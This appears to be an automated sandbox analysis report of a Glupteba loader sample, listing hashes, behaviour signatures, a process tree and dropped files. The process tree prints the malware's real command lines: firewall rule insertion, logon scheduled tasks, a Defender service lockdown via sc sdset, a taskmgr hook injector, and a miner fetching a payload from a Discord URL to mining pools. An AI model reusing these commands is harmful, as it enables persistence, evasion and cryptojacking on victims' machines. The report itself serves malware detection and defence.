Overview

overview

10

Static

static

1

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    299s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01-05-2024 22:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    438d64d55a7bb0b31d56195b65d4d5514967a5b4b899ceced1184971b094917f.exe

  • Size

    4.2MB

  • MD5

    ab64b774115e5a31fa67930f9d881271

  • SHA1

    7da92f9343b38503341fba4b47bad38432ee01f9

  • SHA256

    438d64d55a7bb0b31d56195b65d4d5514967a5b4b899ceced1184971b094917f

  • SHA512

    5d4517af8c7b42ea951f79488b45f07a952fb736c4c08d8d4f5551c5b039d1ef93b45557f99940229294e56d1baaf2046add8fa5867e28409a819804d3dc5101

  • SSDEEP

    98304:2CfswowKC3Nod9NWer/yus4d0EUxRnCNEta54PQhkn1:2AsGzoVWerKPkEt2PKn1

Score
10/10
gluptebadiscoverydropperevasionloaderpersistencerootkittrojanupx

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba payload 33 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
    evasiontrojan
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Executes dropped EXE 7 IoCs
  • UPX packed file 19 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Windows security modification 2 TTPs 7 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

    rootkitevasion
  • Drops file in System32 directory 10 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • GoLang User-Agent 2 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\438d64d55a7bb0b31d56195b65d4d5514967a5b4b899ceced1184971b094917f.exe
    "C:\Users\Admin\AppData\Local\Temp\438d64d55a7bb0b31d56195b65d4d5514967a5b4b899ceced1184971b094917f.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3368
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3868
    • C:\Users\Admin\AppData\Local\Temp\438d64d55a7bb0b31d56195b65d4d5514967a5b4b899ceced1184971b094917f.exe
      "C:\Users\Admin\AppData\Local\Temp\438d64d55a7bb0b31d56195b65d4d5514967a5b4b899ceced1184971b094917f.exe"
      2⤵
      • Windows security bypass
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1976
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:192
      • C:\Windows\System32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2084
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:4568
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2612
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2584
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Manipulates WinMonFS driver.
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2228
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3432
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:4984
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /delete /tn ScheduledUpdate /f
          4⤵
            PID:5024
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2432
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:872
          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:3948
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            4⤵
            • Creates scheduled task(s)
            PID:2132
          • C:\Windows\windefender.exe
            "C:\Windows\windefender.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2924
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4888
              • C:\Windows\SysWOW64\sc.exe
                sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                6⤵
                • Launches sc.exe
                • Suspicious use of AdjustPrivilegeToken
                PID:4972
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:3516
          • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
            4⤵
            • Executes dropped EXE
            PID:2904
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:2236
          • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
            4⤵
            • Executes dropped EXE
            PID:528
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:60
          • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
            4⤵
            • Executes dropped EXE
            PID:1896
    • C:\Windows\windefender.exe
      C:\Windows\windefender.exe
      1⤵
      • Executes dropped EXE
      • Modifies data under HKEY_USERS
      PID:3856

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r5sxvjiv.xdp.ps1
      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
      Filesize

      2.0MB

      MD5

      1bf850b4d9587c1017a75a47680584c4

      SHA1

      75cd4738ffc07f203c3f3356bc946fdd0bcdbe19

      SHA256

      ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955

      SHA512

      ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
      Filesize

      2.8MB

      MD5

      713674d5e968cbe2102394be0b2bae6f

      SHA1

      90ac9bd8e61b2815feb3599494883526665cb81e

      SHA256

      f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

      SHA512

      e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
      Filesize

      2.0MB

      MD5

      dcb505dc2b9d8aac05f4ca0727f5eadb

      SHA1

      4f633edb62de05f3d7c241c8bc19c1e0be7ced75

      SHA256

      61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

      SHA512

      31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
      Filesize

      281KB

      MD5

      d98e33b66343e7c96158444127a117f6

      SHA1

      bb716c5509a2bf345c6c1152f6e3e1452d39d50d

      SHA256

      5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

      SHA512

      705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      1c19c16e21c97ed42d5beabc93391fc5

      SHA1

      8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

      SHA256

      1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

      SHA512

      7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      bb58b394958d1d84f4b9ab61bd2bc98b

      SHA1

      f5a6ae89e7a58bce7418e77d5a63808c3610901b

      SHA256

      d2144ae12498d42256256983a07d098562e5ced214008460356be0f80adf63d9

      SHA512

      10a4ec7e24da9bbc304b646b43fc6639103adb5ed151ab318ace774761ac74aa30db18ae006f717561a2af624904ee5b7c7ad008d20e2a44022a6e4650e9eb55

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      6ebbd189fb6c13c5b06dd737d214a503

      SHA1

      a36516d068170ee40071c6887b3c922b4648a60b

      SHA256

      25bddddbd3f13acd8048d3c1e1479603f0009bea919261d89bc2df20240ccdfb

      SHA512

      2fea376a1063ba7aa01573fe526ea9170c5279dfd4ff1b60efd3db5599172feb6c96ea53edba4e23f69ae1f7206df270e3949c58201998ab7d88cf552222e197

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      f2060eecee3a071f5fb23dfefbd6fe3e

      SHA1

      350d97dc121c21d3cc699e269d27d8bd0537e249

      SHA256

      3a1e0b9a846d6823020a44c131ff9d734191c20309d99718df7318aa312bf79b

      SHA512

      cad28c2d73e0dfaa51a8d26b9c7170a57c6795628cde4ade7ecdb9cd3c35c7f55fee9492b4c2b4df00d6b70e04ce84a843ec671ef4ae983e00557bbdfc58fca3

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      4a8091c608df2cde8e9f3bebc288f21b

      SHA1

      0e596ee1fac9ac1ade80ffec66ec4afbf127c670

      SHA256

      a90e68e34fb04641288ff77fb575491edf509e38037016282a527b09e273b156

      SHA512

      3875dbe3bc1a04de74dcfeba712c1c499b3b1729fbbfccba0a93c72e8572156c0a764a88e612f7ccc04d6ad4c4e45fe3944579ccaa785b1f3a652c8cbcc01c48

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      6f4b4aac4f8119cb7851d8c8dfb39203

      SHA1

      dc2f0220d4b98201ea33dff4a465d7422bf01be5

      SHA256

      d62f41a40be60d4b2941a369224fed72fe34c97092e73eeb30382333894aa89e

      SHA512

      26a7c104a13a0e1e5fde9aa57d84d64855234e7800010b64fb492cbe4adf522b15e9ca28a6d844bf42938cdb93c6dbc4227eb052184b8f8f5abc9fb4e91b7723

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      e7c906362c0fd7a25ad2d8117afb190b

      SHA1

      9d00694d20e2403df0b4da91bba6353bebd30302

      SHA256

      47d00def9de2c4ad4fcc87927d9a336ec0ecfc9e68819812cda2cf915ece3bf6

      SHA512

      16689667225ae104e81dc538b0f041235eadcc9f073052a5be0132f8322bb50f86fe667adba11c1b92ab2a993999095c0423dbc8932b70bc1e3a3b7f4bcd4e4e

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      3e5d9957143e9972a26fe2604af79840

      SHA1

      9841ebb6d01cd8be470d27e02b51b77963828c21

      SHA256

      b3641eb9c3f41565d1e690fe73bd30f0b90e85223c825c506b22146db80f0f2d

      SHA512

      63e7cd65338b4e08d2a12423d7e67b9889db5d3476fd8ce7db632e347bfb0cbb41191060ba0361cd47ea93ad6db919b21bcadc39e8ecd040b547761c04fc4f0a

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      2f5b46787ca2e510ad3c3c43e01b7534

      SHA1

      bf81b0848218499f5f7c45fbe6d788572096d899

      SHA256

      55dd746f1e94dba8ad21fe035bdee27c33238d67f23d555c8c09b8b1e4f7a225

      SHA512

      6d4c66ac89dce6a7edf65bf8f81101eed689d4017c9b239d96be6bcb144ff1a965a6488ca48a7f65f3026d5b8b858ca2f4a5252093d9a15699f1985c173938cd

      Download Submit

    • C:\Windows\rss\csrss.exe
      Filesize

      4.2MB

      MD5

      ab64b774115e5a31fa67930f9d881271

      SHA1

      7da92f9343b38503341fba4b47bad38432ee01f9

      SHA256

      438d64d55a7bb0b31d56195b65d4d5514967a5b4b899ceced1184971b094917f

      SHA512

      5d4517af8c7b42ea951f79488b45f07a952fb736c4c08d8d4f5551c5b039d1ef93b45557f99940229294e56d1baaf2046add8fa5867e28409a819804d3dc5101

      Download Submit

    • C:\Windows\windefender.exe
      Filesize

      2.0MB

      MD5

      8e67f58837092385dcf01e8a2b4f5783

      SHA1

      012c49cfd8c5d06795a6f67ea2baf2a082cf8625

      SHA256

      166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

      SHA512

      40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

      Download Submit

    • memory/60-2305-0x00000000704F0000-0x000000007053B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/60-2306-0x0000000070560000-0x00000000708B0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/192-305-0x0000000007FB0000-0x0000000008300000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/192-331-0x0000000009BA0000-0x0000000009C45000-memory.dmp

      Filesize

      660KB

      Download

    • memory/192-326-0x00000000707A0000-0x0000000070AF0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/192-325-0x0000000070730000-0x000000007077B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/192-306-0x00000000086B0000-0x00000000086FB000-memory.dmp

      Filesize

      300KB

      Download

    • memory/528-2282-0x00000000008C0000-0x000000000118D000-memory.dmp

      Filesize

      8.8MB

      Download

    • memory/528-2526-0x00000000008C0000-0x000000000118D000-memory.dmp

      Filesize

      8.8MB

      Download

    • memory/528-2530-0x00000000008C0000-0x000000000118D000-memory.dmp

      Filesize

      8.8MB

      Download

    • memory/872-1522-0x0000000070630000-0x0000000070980000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/872-1521-0x00000000705E0000-0x000000007062B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/872-1501-0x0000000008010000-0x0000000008360000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/1896-2527-0x0000000000400000-0x00000000008E8000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/1896-2535-0x0000000000400000-0x00000000008E8000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/1896-2522-0x0000000000400000-0x00000000008E8000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/1896-2531-0x0000000000400000-0x00000000008E8000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/1976-1021-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-2277-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1758-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1772-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1768-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1766-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1764-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1762-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1760-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-2524-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-2528-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-2532-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1744-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1786-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1788-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1780-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1770-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1756-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1790-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1754-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1782-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1778-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1752-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1774-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1784-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1776-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1750-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2228-1735-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/2236-2041-0x00000000081A0000-0x00000000084F0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2236-2063-0x00000000704F0000-0x000000007053B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/2236-2064-0x0000000070560000-0x00000000708B0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2432-1290-0x0000000009260000-0x0000000009305000-memory.dmp

      Filesize

      660KB

      Download

    • memory/2432-1285-0x0000000070650000-0x00000000709A0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2432-1284-0x00000000705E0000-0x000000007062B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/2432-1265-0x0000000008290000-0x00000000082DB000-memory.dmp

      Filesize

      300KB

      Download

    • memory/2432-1263-0x00000000075A0000-0x00000000078F0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2584-804-0x00000000707A0000-0x0000000070AF0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2584-803-0x0000000070730000-0x000000007077B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/2612-564-0x0000000070730000-0x000000007077B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/2612-544-0x0000000007F60000-0x00000000082B0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2612-565-0x0000000070780000-0x0000000070AD0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2904-2038-0x0000000000400000-0x00000000008E1000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/2904-2043-0x0000000000400000-0x00000000008E1000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/2924-1745-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/2924-1749-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/3368-302-0x0000000004F50000-0x000000000583B000-memory.dmp

      Filesize

      8.9MB

      Download

    • memory/3368-2-0x0000000004F50000-0x000000000583B000-memory.dmp

      Filesize

      8.9MB

      Download

    • memory/3368-1-0x00000000033A0000-0x00000000037A4000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/3368-3-0x0000000000400000-0x0000000000D1C000-memory.dmp

      Filesize

      9.1MB

      Download

    • memory/3368-300-0x0000000000400000-0x0000000000D1C000-memory.dmp

      Filesize

      9.1MB

      Download

    • memory/3368-299-0x0000000000400000-0x0000000002EE9000-memory.dmp

      Filesize

      42.9MB

      Download

    • memory/3432-1052-0x0000000009380000-0x0000000009425000-memory.dmp

      Filesize

      660KB

      Download

    • memory/3432-1025-0x0000000007A00000-0x0000000007D50000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3432-1047-0x00000000706E0000-0x0000000070A30000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3432-1046-0x0000000070690000-0x00000000706DB000-memory.dmp

      Filesize

      300KB

      Download

    • memory/3432-1027-0x0000000007E00000-0x0000000007E4B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/3516-1815-0x00000000704F0000-0x000000007053B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/3516-1794-0x0000000007A30000-0x0000000007D80000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3516-1796-0x0000000007E30000-0x0000000007E7B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/3516-1816-0x0000000070540000-0x0000000070890000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3516-1821-0x00000000093C0000-0x0000000009465000-memory.dmp

      Filesize

      660KB

      Download

    • memory/3856-1748-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/3856-1751-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/3856-1755-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/3856-1761-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/3868-13-0x00000000078E0000-0x0000000007946000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3868-7-0x0000000006990000-0x00000000069C6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3868-35-0x0000000008F00000-0x0000000008F3C000-memory.dmp

      Filesize

      240KB

      Download

    • memory/3868-12-0x0000000007950000-0x00000000079B6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3868-14-0x0000000007A50000-0x0000000007DA0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3868-16-0x0000000008030000-0x000000000807B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/3868-11-0x0000000073900000-0x0000000073FEE000-memory.dmp

      Filesize

      6.9MB

      Download

    • memory/3868-10-0x00000000076D0000-0x00000000076F2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3868-74-0x0000000070610000-0x000000007065B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/3868-9-0x0000000073900000-0x0000000073FEE000-memory.dmp

      Filesize

      6.9MB

      Download

    • memory/3868-8-0x00000000070A0000-0x00000000076C8000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3868-66-0x0000000008FC0000-0x0000000009036000-memory.dmp

      Filesize

      472KB

      Download

    • memory/3868-4-0x000000007390E000-0x000000007390F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3868-15-0x0000000007E40000-0x0000000007E5C000-memory.dmp

      Filesize

      112KB

      Download

    • memory/3868-73-0x0000000009DE0000-0x0000000009E13000-memory.dmp

      Filesize

      204KB

      Download

    • memory/3868-81-0x0000000009E20000-0x0000000009EC5000-memory.dmp

      Filesize

      660KB

      Download

    • memory/3868-76-0x0000000009DC0000-0x0000000009DDE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3868-75-0x0000000070660000-0x00000000709B0000-memory.dmp

      Filesize

      3.3MB

      Download

